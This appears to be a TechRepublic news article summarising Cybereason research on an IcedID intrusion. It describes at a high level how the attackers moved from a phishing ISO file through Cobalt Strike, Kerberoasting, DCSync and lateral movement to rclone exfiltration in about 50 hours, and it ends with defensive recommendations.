Threat attackers can own your data in just two days

We Keep you Connected

Threat attackers can own your data in just two days

Threat attackers can own your data in just two days
Your email has been sent
This report shows cybercriminals need only a couple days to access your full corporate network and exfiltrate its data. Read on to learn more.
New research from Cybereason exposes how fast cybercriminals can be when it comes to exploit an initial infection obtained on a corporate user.

Jump to:
IcedID is a banking Trojan that has been actively used by cybercriminals since 2017 and shared part of its code with another widely used malware family known as Pony, whose source code leaked in 2015.
While mostly distributed via spam emails built to infect users, IcedID was also delivered in the beginning of 2023 by a phishing campaign pretending to spread a Zoom software update.
IcedID has also frequently been distributed as payload, spread by the infamous Emotet and Trickbot infrastructure, and to run ransomware attacks, as exposed by the FBI.
In this attack campaign, users receive and open a password protected archive containing an ISO file. Once the ISO file is clicked on, it creates a virtual disk. If the user navigates and clicks on the only visible file, a Link File Format file, the LNK file starts the infection process by launching a batch file.
This drops a Dynamic Link Library file that is executed in a temporary directory. The DLL file then downloads the IcedID payload from a remote server and loads the payload into the process (Figure A).

The malware then uses the legitimate net.exe binary from the infected system to collect information about the domain, workstation and members of the Domains Admins group.
Persistence is established by creating a scheduled task on the computer, which executes the malware every hour and at each logon operation.
Cybereason researchers exposed how fast cybercriminals can be when it comes to exploiting initial access to a company.
Once the initial IcedID infection is done, an interactive command line (cmd.exe) session is started, which downloads additional files on the infected system. Seven minutes after the initial infection, a Cobalt Strike beacon is used on the infected computer. The Cobalt Strike code loads Rubeus, a tool designed for Kerberos interaction and abuse, which also collects more network data from the system. Attackers obtain the credentials of a service account via Kerberoasting, a known technique based on abusing valid Kerberos tickets, 15 minutes after the initial infection.
57 minutes after the infection, the lateral movement operation starts. The attacker uses the legitimate command line tool ping.exe from the system to check if the host is alive, then executes the same Cobalt Strike payload on the remote workstation via wmic.exe. That process is repeated several times, each time bouncing on a different endpoint or server. Large portions of the network infrastructure are scanned.
A DCSync attack is performed 19 hours after the initial compromise. This technique allows an attacker to impersonate a domain controller to obtain password hashes from other domain controllers, enabling the attacker to increase their foothold on every domain of the targeted company.
Shortly before the exfiltration starts and 46 hours after the initial infection, the attackers deploy the legitimate Atera remote administration tool on several different machines. The implementation of that tool on several computers allows the attackers to come back to the system even if the IcedID malware is discovered and computers are cleaned from it.
The IcedID malware hooks into several Internet browsers to steal credentials, session cookies and saved information. In addition, the attackers used the legitimate rclone fine syncing tool to encrypt and send several directories they chose to the Mega file sharing service. This data exfiltration starts roughly 50 hours after the initial compromise.
Cybereason shows how fast threat actors can be when it comes to moving laterally on different computers within a target network and exfiltrating data from them. While several of the reported techniques can be done automatically without human intervention, the lateral movements and the exfiltration stages need more human power. It is concerning to see that a threat actor can do all of this in only 50 hours.
The report notes the final step is data exfiltration, but the attack could easily lead to a ransomware demand. The tooling and TTP described by Cybereason is reminiscent of the OnePercent group, which used IcedID, Cobalt Strike, PowerShell and Rclone in a manner similar to the actions documented in this report.
Have all operating systems and software up to date and patched to prevent any compromise via the use of a common vulnerability. Do not allow users on the network to open any ISO files unless strictly needed by users. That file type should only be allowed for administrators.
Finally, security solutions need to be deployed on all endpoints and servers to detect suspicious behavior. Security awareness should be provided to all employees, especially on email threats, which is still the most prevalent initial infection vector.
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.
Strengthen your organization’s IT security defenses by keeping abreast of the latest cybersecurity news, solutions, and best practices.
Threat attackers can own your data in just two days
Your email has been sent
Your message has been sent
TechRepublic Premium content helps you solve your toughest IT issues and jump-start your career or next project.
Looking for the best payroll software for your small business? Check out our top picks for 2022 and read our in-depth analysis.
Next year, cybercriminals will be as busy as ever. Are IT departments ready?
The company, which for several years has been on a buying spree for best-of-breed products, is integrating platforms to generate synergies for speed, insights and collaboration.
Organize a number of different applicants using an ATS to cut down on the amount of unnecessary time spent finding the right candidate.
Whether you are a Microsoft Excel beginner or an advanced user, you’ll benefit from these step-by-step tutorials.
A poor user experience can damage your company’s reputation, impede business growth and even lead to failure. That’s why it’s so important to work with a talented UX specialist who can ensure that your website and applications are visually appealing and user friendly for your target audience. This TechRepublic Premium hiring kit will help you …
All company communication needs may vary but certain standard template messages can come in handy for IT staff to keep employees up to date on “need to know” informational bulletins. These bulletins may be one-off or regularly scheduled communications to help raise awareness about your technology processes, accepted procedures and best practices or to explain …
Open source database program MongoDB has become a hot technology, and MongoDB administrators are in high demand. This job description will help you identify the best candidates for the job. From the job description: The MongoDB administrator will help manage, maintain and troubleshoot the company databases housed in MongoDB. They will create scripts to automate …
The business information analyst plays a key role in evaluating and recommending improvements to the company’s IT systems. This job description outlines the skills, experience and knowledge the position requires. From the description: Business information analysts help identify customer requirements and recommend ways to address them. They engage in IT projects from development to testing, …